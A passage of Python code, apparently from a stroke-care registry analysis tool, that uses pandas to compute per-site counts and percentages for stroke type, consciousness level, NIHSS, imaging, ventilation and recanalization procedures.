self.statsDf['% department type - neurology'] = self.statsDf.apply(lambda x: round(((x['# department type - neurology']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=2, new_column_name='# department type - neurosurgery')
self.statsDf['% department type - neurosurgery'] = self.statsDf.apply(lambda x: round(((x['# department type - neurosurgery']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=3, new_column_name='# department type - anesthesiology/resuscitation/critical care')
self.statsDf['% department type - anesthesiology/resuscitation/critical care'] = self.statsDf.apply(lambda x: round(((x['# department type - anesthesiology/resuscitation/critical care']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=4, new_column_name='# department type - internal medicine')
self.statsDf['% department type - internal medicine'] = self.statsDf.apply(lambda x: round(((x['# department type - internal medicine']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=5, new_column_name='# department type - geriatrics')
self.statsDf['% department type - geriatrics'] = self.statsDf.apply(lambda x: round(((x['# department type - geriatrics']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DEPARTMENT_TYPE", value=6, new_column_name='# department type - Other')
self.statsDf['% department type - Other'] = self.statsDf.apply(lambda x: round(((x['# department type - Other']/(x['Total Patients'] - x['tmp'])) * 100), 2) if (x['Total Patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
###################
# HOSPITALIZED IN #
###################
self.tmp = self.df.groupby(['Protocol ID', 'HOSPITALIZED_IN']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="HOSPITALIZED_IN", value=1, new_column_name='# patients hospitalized in stroke unit / ICU')
self.statsDf['% patients hospitalized in stroke unit / ICU'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in stroke unit / ICU']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HOSPITALIZED_IN", value=2, new_column_name='# patients hospitalized in monitored bed with telemetry')
self.statsDf['% patients hospitalized in monitored bed with telemetry'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in monitored bed with telemetry']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HOSPITALIZED_IN", value=3, new_column_name='# patients hospitalized in standard bed')
self.statsDf['% patients hospitalized in standard bed'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in standard bed']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf['# patients hospitalized in stroke unit / ICU or monitored bed'] = self.statsDf['# patients hospitalized in stroke unit / ICU'] + self.statsDf['# patients hospitalized in monitored bed with telemetry']
self.statsDf['% patients hospitalized in stroke unit / ICU or monitored bed'] = self.statsDf.apply(lambda x: round(((x['# patients hospitalized in stroke unit / ICU or monitored bed']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
###############################
# ASSESSED FOR REHABILITATION #
###############################
self.tmp = is_ich_sah_cvt.groupby(['Protocol ID', 'ASSESSED_FOR_REHAB']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ASSESSED_FOR_REHAB", value=3, new_column_name='# patients assessed for rehabilitation - Not known')
self.statsDf['% patients assessed for rehabilitation - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients assessed for rehabilitation - Not known']/x['is_ich_sah_cvt_patients']) * 100), 2) if x['is_ich_sah_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ASSESSED_FOR_REHAB", value=1, new_column_name='# patients assessed for rehabilitation - Yes')
self.statsDf['% patients assessed for rehabilitation - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients assessed for rehabilitation - Yes']/(x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="ASSESSED_FOR_REHAB", value=2, new_column_name='# patients assessed for rehabilitation - No')
self.statsDf['% patients assessed for rehabilitation - No'] = self.statsDf.apply(lambda x: round(((x['# patients assessed for rehabilitation - No']/(x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# patients assessed for rehabilitation - Not known']) > 0 else 0, axis=1)
###############
# STROKE TYPE #
###############
self.tmp = self.df.groupby(['Protocol ID', 'STROKE_TYPE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=1, new_column_name='# stroke type - ischemic stroke')
self.statsDf['% stroke type - ischemic stroke'] = self.statsDf.apply(lambda x: round(((x['# stroke type - ischemic stroke']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=2, new_column_name='# stroke type - intracerebral hemorrhage')
self.statsDf['% stroke type - intracerebral hemorrhage'] = self.statsDf.apply(lambda x: round(((x['# stroke type - intracerebral hemorrhage']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=3, new_column_name='# stroke type - transient ischemic attack')
self.statsDf['% stroke type - transient ischemic attack'] = self.statsDf.apply(lambda x: round(((x['# stroke type - transient ischemic attack']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=4, new_column_name='# stroke type - subarrachnoid hemorrhage')
self.statsDf['% stroke type - subarrachnoid hemorrhage'] = self.statsDf.apply(lambda x: round(((x['# stroke type - subarrachnoid hemorrhage']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=5, new_column_name='# stroke type - cerebral venous thrombosis')
self.statsDf['% stroke type - cerebral venous thrombosis'] = self.statsDf.apply(lambda x: round(((x['# stroke type - cerebral venous thrombosis']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="STROKE_TYPE", value=6, new_column_name='# stroke type - undetermined stroke')
self.statsDf['% stroke type - undetermined stroke'] = self.statsDf.apply(lambda x: round(((x['# stroke type - undetermined stroke']/x['Total Patients']) * 100), 2) if x['Total Patients'] > 0 else 0, axis=1)
#######################
# CONSCIOUSNESS LEVEL #
#######################
self.tmp = is_ich_sah_cvt.groupby(['Protocol ID', 'CONSCIOUSNESS_LEVEL']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=5, new_column_name='# level of consciousness - not known')
self.statsDf['% level of consciousness - not known'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - not known']/x['is_ich_sah_cvt_patients']) * 100), 2) if x['is_ich_sah_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=1, new_column_name='# level of consciousness - alert')
self.statsDf['% level of consciousness - alert'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - alert']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=2, new_column_name='# level of consciousness - drowsy')
self.statsDf['% level of consciousness - drowsy'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - drowsy']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=3, new_column_name='# level of consciousness - comatose')
self.statsDf['% level of consciousness - comatose'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - comatose']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CONSCIOUSNESS_LEVEL", value=4, new_column_name='# level of consciousness - GCS')
self.statsDf['% level of consciousness - GCS'] = self.statsDf.apply(lambda x: round(((x['# level of consciousness - GCS']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
#######
# GCS #
#######
# Get temporary dataframe with the level of consciousness - GCS
gcs = is_ich_sah_cvt[is_ich_sah_cvt['CONSCIOUSNESS_LEVEL'].isin([4])].copy()
# Calculate total number of patients with GCS level of consciousness per site
self.statsDf['gcs_patients'] = self._count_patients(dataframe=gcs)
self.tmp = gcs.groupby(['Protocol ID', 'GCS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="GCS", value=1, new_column_name='# GCS - 15-13')
self.statsDf['% GCS - 15-13'] = self.statsDf.apply(lambda x: round(((x['# GCS - 15-13']/x['gcs_patients']) * 100), 2) if x['gcs_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="GCS", value=2, new_column_name='# GCS - 12-8')
self.statsDf['% GCS - 12-8'] = self.statsDf.apply(lambda x: round(((x['# GCS - 12-8']/x['gcs_patients']) * 100), 2) if x['gcs_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="GCS", value=3, new_column_name='# GCS - <8')
self.statsDf['% GCS - <8'] = self.statsDf.apply(lambda x: round(((x['# GCS - <8']/x['gcs_patients']) * 100), 2) if x['gcs_patients'] > 0 else 0, axis=1)
self.statsDf.drop(['gcs_patients'], inplace=True, axis=1)
# GCS is mapped to the consciousness level. GCS 15-13 is mapped to alert, GCS 12-8 to drowsy and GCS < 8 to comatose
self.statsDf['alert_all'] = self.statsDf['# level of consciousness - alert'] + self.statsDf['# GCS - 15-13']
self.statsDf['alert_all_perc'] = self.statsDf.apply(lambda x: round(((x['alert_all']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf['drowsy_all'] = self.statsDf['# level of consciousness - drowsy'] + self.statsDf['# GCS - 12-8']
self.statsDf['drowsy_all_perc'] = self.statsDf.apply(lambda x: round(((x['drowsy_all']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
self.statsDf['comatose_all'] = self.statsDf['# level of consciousness - comatose'] + self.statsDf['# GCS - <8']
self.statsDf['comatose_all_perc'] = self.statsDf.apply(lambda x: round(((x['comatose_all']/(x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known'])) * 100), 2) if (x['is_ich_sah_cvt_patients'] - x['# level of consciousness - not known']) > 0 else 0, axis=1)
del gcs
#########
# NIHSS #
#########
# Separate calculation for CZ
if country_code == 'CZ':
self.tmp = is_ich.groupby(['Protocol ID', 'NIHSS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=1, new_column_name='# NIHSS - Not performed')
self.statsDf['% NIHSS - Not performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not performed']/x['is_ich_patients']) * 100), 2) if x['is_ich_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=2, new_column_name='# NIHSS - Performed')
self.statsDf['% NIHSS - Performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Performed']/x['is_ich_patients']) * 100), 2) if x['is_ich_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=3, new_column_name='# NIHSS - Not known')
self.statsDf['% NIHSS - Not known'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not known']/x['is_ich_patients']) * 100), 2) if x['is_ich_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with patient who had performed NIHSS (NIHSS = 2)
nihss = is_ich[is_ich['NIHSS'].isin([2])]
tmpDf = nihss.groupby(['Protocol ID']).NIHSS_SCORE.agg(['median']).rename(columns={'median': 'NIHSS median score'})
factorDf = self.statsDf.merge(tmpDf, how='outer', left_on='Protocol ID', right_on='Protocol ID')
factorDf.fillna(0, inplace=True)
self.statsDf['NIHSS median score'] = factorDf['NIHSS median score']
del nihss
else:
self.tmp = is_ich_cvt.groupby(['Protocol ID', 'NIHSS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=1, new_column_name='# NIHSS - Not performed')
self.statsDf['% NIHSS - Not performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not performed']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=2, new_column_name='# NIHSS - Performed')
self.statsDf['% NIHSS - Performed'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Performed']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NIHSS", value=3, new_column_name='# NIHSS - Not known')
self.statsDf['% NIHSS - Not known'] = self.statsDf.apply(lambda x: round(((x['# NIHSS - Not known']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with patient who had performed NIHSS (NIHSS = 2)
nihss = is_ich_cvt[is_ich_cvt['NIHSS'].isin([2])]
tmpDf = nihss.groupby(['Protocol ID']).NIHSS_SCORE.agg(['median']).rename(columns={'median': 'NIHSS median score'})
factorDf = self.statsDf.merge(tmpDf, how='outer', left_on='Protocol ID', right_on='Protocol ID')
factorDf.fillna(0, inplace=True)
self.statsDf['NIHSS median score'] = factorDf['NIHSS median score']
del nihss
##########
# CT/MRI #
##########
is_ich_tia_cvt_not_referred = is_ich_tia_cvt.loc[~(is_ich_tia_cvt['STROKE_TYPE'].isin([1]) & is_ich_tia_cvt['RECANALIZATION_PROCEDURES'].isin([5,6,7,8]))].copy()
self.statsDf['is_ich_tia_cvt_not_referred_patients'] = self._count_patients(dataframe=is_ich_tia_cvt_not_referred)
self.tmp = is_ich_tia_cvt_not_referred.groupby(['Protocol ID', 'CT_MRI']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CT_MRI", value=1, new_column_name='# CT/MRI - Not performed')
self.statsDf['% CT/MRI - Not performed'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Not performed']/x['is_ich_tia_cvt_not_referred_patients']) * 100), 2) if x['is_ich_tia_cvt_not_referred_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CT_MRI", value=2, new_column_name='# CT/MRI - performed')
self.statsDf['% CT/MRI - performed'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - performed']/x['is_ich_tia_cvt_not_referred_patients']) * 100), 2) if x['is_ich_tia_cvt_not_referred_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CT_MRI", value=3, new_column_name='# CT/MRI - Not known')
self.statsDf['% CT/MRI - Not known'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Not known']/x['is_ich_tia_cvt_not_referred_patients']) * 100), 2) if x['is_ich_tia_cvt_not_referred_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with patients who had performed CT/MRI (CT_MRI = 2)
ct_mri = is_ich_tia_cvt_not_referred[is_ich_tia_cvt_not_referred['CT_MRI'].isin([2])]
ct_mri['CT_TIME'] = pd.to_numeric(ct_mri['CT_TIME'])
self.tmp = ct_mri.groupby(['Protocol ID', 'CT_TIME']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="CT_TIME", value=1, new_column_name='# CT/MRI - Performed within 1 hour after admission')
self.statsDf['% CT/MRI - Performed within 1 hour after admission'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Performed within 1 hour after admission']/x['# CT/MRI - performed']) * 100), 2) if x['# CT/MRI - performed'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="CT_TIME", value=2, new_column_name='# CT/MRI - Performed later than 1 hour after admission')
self.statsDf['% CT/MRI - Performed later than 1 hour after admission'] = self.statsDf.apply(lambda x: round(((x['# CT/MRI - Performed later than 1 hour after admission']/x['# CT/MRI - performed']) * 100), 2) if x['# CT/MRI - performed'] > 0 else 0, axis=1)
self.statsDf.drop(['is_ich_tia_cvt_not_referred_patients'], inplace=True, axis=1)
del ct_mri, is_ich_tia_cvt_not_referred
####################
# VASCULAR IMAGING #
####################
self.tmp = ich_sah.groupby(['Protocol ID', 'CTA_MRA_DSA']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'1', '1,2', '1,3'}, new_column_name='# vascular imaging - CTA')
self.statsDf['% vascular imaging - CTA'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - CTA']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'2', '1,2', '2,3'}, new_column_name='# vascular imaging - MRA')
self.statsDf['% vascular imaging - MRA'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - MRA']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'3', '1,3', '2,3'}, new_column_name='# vascular imaging - DSA')
self.statsDf['% vascular imaging - DSA'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - DSA']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'4'}, new_column_name='# vascular imaging - None')
self.statsDf['% vascular imaging - None'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - None']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_more_values(column_name="CTA_MRA_DSA", value={'1,2', '1,3', '2,3'}, new_column_name='# vascular imaging - two modalities')
self.statsDf['% vascular imaging - two modalities'] = self.statsDf.apply(lambda x: round(((x['# vascular imaging - two modalities']/x['ich_sah_patients']) * 100), 2) if x['ich_sah_patients'] > 0 else 0, axis=1)
### DATA NORMALIZATION
norm_tmp = self.statsDf[['% vascular imaging - CTA', '% vascular imaging - MRA', '% vascular imaging - DSA', '% vascular imaging - None']].copy()
norm_tmp.loc[:,'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['vascular_imaging_cta_norm'] = ((norm_tmp['% vascular imaging - CTA']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vascular_imaging_mra_norm'] = ((norm_tmp['% vascular imaging - MRA']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vascular_imaging_dsa_norm'] = ((norm_tmp['% vascular imaging - DSA']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vascular_imaging_none_norm'] = ((norm_tmp['% vascular imaging - None']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
##############
# VENTILATOR #
##############
# Separate calculation for CZ (difference in the stroke types)
if country_code == 'CZ':
self.tmp = is_ich.groupby(['Protocol ID', 'VENTILATOR']).size().to_frame('count').reset_index()
# Get number of patients from the old version
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=3, new_column_name='# patients put on ventilator - Not known')
self.statsDf['% patients put on ventilator - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Not known']/(x['is_ich_patients'] - x['tmp'])) * 100), 2) if (x['is_ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=1, new_column_name='# patients put on ventilator - Yes')
self.statsDf['% patients put on ventilator - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Yes']/(x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=2, new_column_name='# patients put on ventilator - No')
self.statsDf['% patients put on ventilator - No'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - No']/(x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
else:
self.tmp = is_ich_cvt.groupby(['Protocol ID', 'VENTILATOR']).size().to_frame('count').reset_index()
# Get number of patients from the old version
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=3, new_column_name='# patients put on ventilator - Not known')
self.statsDf['% patients put on ventilator - Not known'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Not known']/(x['is_ich_cvt_patients'] - x['tmp'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=1, new_column_name='# patients put on ventilator - Yes')
self.statsDf['% patients put on ventilator - Yes'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - Yes']/(x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="VENTILATOR", value=2, new_column_name='# patients put on ventilator - No')
self.statsDf['% patients put on ventilator - No'] = self.statsDf.apply(lambda x: round(((x['# patients put on ventilator - No']/(x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['tmp'] - x['# patients put on ventilator - Not known']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
#############################
# RECANALIZATION PROCEDURES #
#############################
# Count each RECANALIZATION_PROCEDURES answer (values 1-9) per site over the
# ischemic patients; every percentage below uses all ischemic patients as the
# denominator, with a guard against division by zero.
self.tmp = isch.groupby(['Protocol ID', 'RECANALIZATION_PROCEDURES']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=1, new_column_name='# recanalization procedures - Not done')
self.statsDf['% recanalization procedures - Not done'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Not done']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=2, new_column_name='# recanalization procedures - IV tPa')
self.statsDf['% recanalization procedures - IV tPa'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=3, new_column_name='# recanalization procedures - IV tPa + endovascular treatment')
self.statsDf['% recanalization procedures - IV tPa + endovascular treatment'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - IV tPa + endovascular treatment']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=4, new_column_name='# recanalization procedures - Endovascular treatment alone')
self.statsDf['% recanalization procedures - Endovascular treatment alone'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Endovascular treatment alone']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=5, new_column_name='# recanalization procedures - IV tPa + referred to another centre for endovascular treatment')
self.statsDf['% recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=6, new_column_name='# recanalization procedures - Referred to another centre for endovascular treatment')
self.statsDf['% recanalization procedures - Referred to another centre for endovascular treatment'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Referred to another centre for endovascular treatment']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=7, new_column_name='# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre')
self.statsDf['% recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=8, new_column_name='# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre')
self.statsDf['% recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="RECANALIZATION_PROCEDURES", value=9, new_column_name='# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre')
self.statsDf['% recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] = self.statsDf.apply(lambda x: round(((x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# tag::recanalized_patients[]
# A patient counts as recanalized when IVT or TBY was actually performed
recanalized_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1])]
self.statsDf['# patients recanalized'] = self._count_patients(dataframe=recanalized_df)
# Denominator: recanalized patients plus those where the procedure was explicitly
# not done (RECANALIZATION_PROCEDURES == 1)
recanalized_denominator_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1]) | isch['RECANALIZATION_PROCEDURES'].isin([1])]
self.statsDf['denominator'] =self._count_patients(dataframe=recanalized_denominator_df)
self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/x['denominator']) * 100), 2) if x['denominator'] > 0 else 0, axis=1)
# Remove the helper denominator column and release the temporary selection
self.statsDf.drop(['denominator'], inplace=True, axis=1)
del recanalized_df
# end::recanalized_patients[]
"""
# Get recanalization procedure differently for CZ, they are taking the possible values differently
if country_code == 'CZ':
# self.statsDf['# patients recanalized'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
recanalized_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1])]
self.statsDf['# patients recanalized'] = self._count_patients(dataframe=recanalized_df)
recanalized_denominator_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1]) | isch['RECANALIZATION_PROCEDURES'].isin([1])]
self.statsDf['denominator'] =self._count_patients(dataframe=recanalized_denominator_df)
#self.statsDf['# patients recanalized'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'], axis=1)
#self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/(x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']) > 0 else 0, axis=1)
